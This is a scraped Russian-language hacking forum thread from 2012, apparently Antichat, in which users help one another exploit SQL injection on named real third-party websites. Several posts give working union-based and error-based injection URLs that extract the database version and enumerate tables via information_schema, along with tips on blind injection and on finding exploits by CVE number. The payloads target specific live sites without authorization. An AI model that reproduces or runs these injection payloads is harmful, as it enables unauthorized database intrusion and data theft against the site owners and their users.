05.02.2012, 18:21
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2Tr[1]x,
Можно.
P.S. Что за прога?
|
|
|
05.02.2012, 18:44
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Ereee
2Tr[1]x
,
Можно.
P.S. Что за прога?
программа Xspider
|
|
|
|
05.02.2012, 18:46
|
|
Познающий
Регистрация: 20.08.2010
Сообщений: 30
С нами:
8278166
Репутация:
0
|
|
Ereee, не подскажешь как именно?
|
|
|
|
05.02.2012, 18:47
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Tr[1
x"]
Tr[1]x said:
Ereee
, не подскажешь как именно?
Обычно сканеры показывают CVE. По нем ищи сплойт в гугле.
|
|
|
|
05.02.2012, 20:30
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
ТАксс, пару вопросов
Сообщение от None
http://kvikmyndir.is/frettir/frett/?id=104374
не могу вывести данные через еррор, кто что подскажет
второе
Сообщение от None
http://www.eeagrants.lv/?id=-10+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
Сообщение от None
http://crumbweb.org/getInterviewDetail.php?id=-11+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
в обоих случаях стольбы подобрал но на екран ничего не выводит, крутить как блинд не избежно или всётаки ожно чтонибуть сделать?
и наконец третее
Сообщение от None
http://www.57productions.com/article_reader.php?id=11
что в запрос не подставлю постоянно вылетает только ошибка и никакого вывода, как быть? |
|
|
|
05.02.2012, 20:45
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
qaz,
третье - слепая
вторая - слепая, попробуй что-нибудь сделать.
|
|
|
|
05.02.2012, 20:49
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
второй наверное слепая
3
http://www.57productions.com/article_reader.php?id=11+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+
третья ветка, поэтому юнион не катит
|
|
|
|
05.02.2012, 21:00
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Konqi
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
Сообщение от None
http://kvikmyndir.is/frettir/frett/?id=104374,%28select%201%20from%28select%20count%2 8*%29,concat%28table_name,0x00,floor%28rand%280%29 *2%29%29x%20from%20information_schema.tables%20gro up%20by%20x%20limit%202,1%29a%29%29--+
может я не туда его влепил?
|
|
|
|
05.02.2012, 21:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
может я не туда его влепил?
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat((select+table_name+from+informatio n_schema.tables+where+table_schema=database()+ limit+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
|
|
|
|
06.02.2012, 00:34
|
|
Познающий
Регистрация: 11.12.2011
Сообщений: 38
С нами:
7589846
Репутация:
0
|
|
Выпилил следующую БД,но limit отказывается работать.Как в таком случае данные выбрать ?
-id+union+select+table_name,2,3+from+information_sc hema.tables
Выдаёт одну запись.Всё.
Забыл добавить,что никаких ошибок аля *OLE DB Driver *не выводится.
system_user не sa,к сожалению = )
Код:
[Microsoft SQL Server 2005
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Tr[1]x](/avatars/avatar135594.jpg?3009461){kind=avatar}
Похожие темы
Комбинированный вид
